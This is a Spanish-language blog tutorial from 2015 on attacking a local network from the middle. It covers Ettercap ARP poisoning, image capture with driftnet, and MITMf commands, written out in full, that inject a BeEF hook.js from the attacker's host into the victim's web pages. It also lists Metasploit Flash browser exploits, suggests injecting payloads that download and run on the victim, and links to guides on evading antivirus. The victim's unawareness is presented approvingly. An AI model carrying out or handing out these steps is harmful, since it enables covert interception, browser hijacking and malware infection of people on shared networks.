jueves, 22 de octubre de 2015

MITM / Man in the middle - Ettercap + MITMF + Beef Exploiting + Metasploit

Main in the middle o hombre en el medio es un ataque en la cual nosotros estaremos en el medio entre los ordenadores y el rooter capturando el trafico de datos con una metodología que pasare a explicar sin tecnicismo en una imagen:


cuando una ordenador hace una petición a un servicio su procedimiento normal es que esta tiene que pasar al rooter y posteriormente al internet, en nuestro caso si la victima hace una petición a un servicio nosotros vamos a recibir los datos en texto plano recolectando datos de información en primer plano, el segundo envió seria al  rooter y luego al internet, en esta oportunidad voy a utilizar Ettercap la cual es una herramienta en código abierto que nos permitirá ejecutar el ataque.

Primer escenario Ettercap


En mi caso ejecutare la plataforma GUI, lo que haremos sera dirigimos a la primera pestaña que les aparecerá primero en el Ettercap daremos en "Sniff", luego de ello escogeremos nuestra interface de red, en mi caso es Eth0, automáticamente pasara a iniciar el servidor de snnifeo, luego nos dirigimos a la opción que parece en la imagen  entraremos a "Hosts" y luego procederá a hacer un análisis de rangos para ver las IP'S o ordenadores conectados ahora mismo, de igual manera escuchara a las entrantes conexiones entrantes en cualquier momento.  

Listado de red lo puedo ver en "Hosts" >> Hosts List


la IP de mi sistema de red es 192.168.179.129 , la de mi victima sera la primera que es 192.168.179.2  una ves identificado a quien haré el ataque procederemos a lanzar el ataque de la siguiente manera.

Luego de ello le daremos en aceptar, ya que estamos estableciendo una conexión entra nuestro sistema con la de la victima, luego de ello iremos a la opción "Mitm" y daremos en "ARP":

luego de ello le daremos en primera opción "para establecer el sniffeo remoto.



al aceptar completamente ya tendríamos el envenenamiento ARP establecido, entonces lo que haré en mi caso sera utilizar driftnet, que es un capturador de imágenes remotas  de sistemas comprometidos en tiempo real, solamente añadimos nuestra interface en mi caso fue #Eth0

 root@kali:~# driftnet -i eth0



Una ves establecido nuestro capturar, al momento que la victima entre a un servidor podemos capturar el trafico de imágenes,  un ejemplo mi victima esta en la siguiente web:

Nuestra victima ni siquiera sospechara nada, ya que hemos infectado la red por ende la explotación se basa en las conexiones de entrada y escucha, entonces pasamos a nuestro ordenador y vemos las imágenes capturadas:

Si desean capturar el trafico de datos en texto plano, les dejare un articulo en donde enseño el método:

http://backtrack-omar.blogspot.pe/2015/10/capturando-e-interceptando-datos-de-red.html 

Segundo escenario MITMF


MITMf tiene como objetivo proporcionar una ventanilla única para los ataques Man in the Middle y la red durante la actualización y la mejora de los ataques y técnicas existentes.

Originalmente construido para hacer frente a las deficiencias significativas de otras herramientas por ejemplo Ettercap, Mallory, ha sido re-escrito casi completamente desde cero para proporcionar un framework modular y fácilmente extensible que cualquiera puede utilizar para implementar su propio ataque MITM.

descarga:
https://github.com/byt3bl33d3r/MITMf/

Lo primero que haremos sera actualizar algunos repertorios que necesitara para ejecutar sus capacidades utilitarias.

root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev 


Lo que haremos sera descargar el MITMF y proceder a instalar sus requerimientos para que pueda funcionar correctamente:

root@kali:~# git clone https://github.com/byt3bl33d3r/MITMf
root@kali:~# cd MITMf && git submodule init && git submodule update --recursive
root@kali:~# pip install -r requirements.txt
root@kali:~# pip install virtualenvwrapper

Una ves completado todo eso, ya tendremos nuestra herramienta lista para ser usada pero antes que nada necesitaremos enfocarnos en una victima la cual sera la misma 192.168.179.2, pero antes de ello utilizaremos "BeEF" para crear nuestro servidor de infección y activarlo.
Para configuar BeFF y añadir los módulos de metasploit puede ver el siguiente articulo:

http://backtrack-omar.blogspot.pe/2015/10/beef-browser-exploitation-framework.html

En este caso lo que haremos sera utilizar el script hook.js, ya que podemos inyectar este código malicioso en los navegadores en los servidores web que la victima entre sin que se de cuenta, para ello utilizaremos BeEF para enviarlo remotamente con el envenenamiento ARP

root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url http://192.168.179.129:3000/hook.js

-i identificamos el tipo interface en mi caso "eth0", --gateway es el servicio rooter y por ende --target la ip de la victima.


entonces ya tenemos listo nuestra conexión main in the middle para infectarlo directamente al momento que la victima entre a cualquier pagina web, en mi caso mi victima entro a una pagina de adultos "Nuevamente" jajaja.

al momento que la victima entre nosotros en primer plano tendremos los datos DNS:

Como vemos vemos los datos de la victima, la cual utiliza windows 7 conectado al navegador Firefox y vemos la URL donde se inyecto el código, otro plano abriremos el panel de BeFF y tendremos su sesión captura, con la cual podemos explotar a nuestra victima.

Aqui unos metodos de explotacion: 

http://backtrack-omar.blogspot.pe/2015/10/beef-browser-exploitation-framework.html


Atacando con metasploit:




En metasploit seria aprovechar el MITMF mediante el exploit de java hace poco tiempo nuevamente hay nuevos exploit para explotar nuevos complementos:

Módulos nuevos:


   Name                                                               Disclosure Date  Rank       Description

auxiliary/server/browser_autopwn2
exploit/multi/browser/adobe_flash_hacking_team_uaf
exploit/multi/browser/adobe_flash_nellymoser_bof 
exploit/multi/browser/adobe_flash_net_connection_confusion
exploit/multi/browser/adobe_flash_opaque_background_uaf
exploit/multi/browser/adobe_flash_shader_drawing_fill 
exploit/multi/browser/adobe_flash_shader_job_overflow 

http://backtrack-omar.blogspot.pe/2015/09/2015-flash-0day-exploit-hackingteam.html 

root@kali:~# python mitmf.py --spoof --arp -i eth0 --gateway 192.168.179.2 --target 192.168.179.132 --inject --js-url (añadiran el payload del exploit que les carge en metasploit)


de igual manera puedes añadir : payloads ejecutables para que lo descarge y ejecute para explotar al sistema, siempre y claro deben dejarlo FUD, aqui el post para hacer tu payload indetectable:

http://backtrack-omar.blogspot.pe/2015/10/evadiendo-av-codificando-payloads-con.html

Diferentes técnicas para crear tus payload:

http://backtrack-omar.blogspot.pe/2015/10/unicorn-la-herramienta-de-infeccion.html
http://backtrack-omar.blogspot.pe/2015/10/winrar-nuestro-viejo-aliado-de.html
http://backtrack-omar.blogspot.pe/2015/10/pupy-remote-administration-tool.html


Espere los aya gustado este articulo !!, un saludo para todas mis amistades.

Saludos y éxitos!

0 comentarios:

Publicar un comentario

Datos del Autor


Obra de K. Haring

Hola, mi nombre es omar soy estudiante de Ingenieria de sistemas en Perú. actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.


"Me considero un novato en busca de conocimiento"


Entradas Populares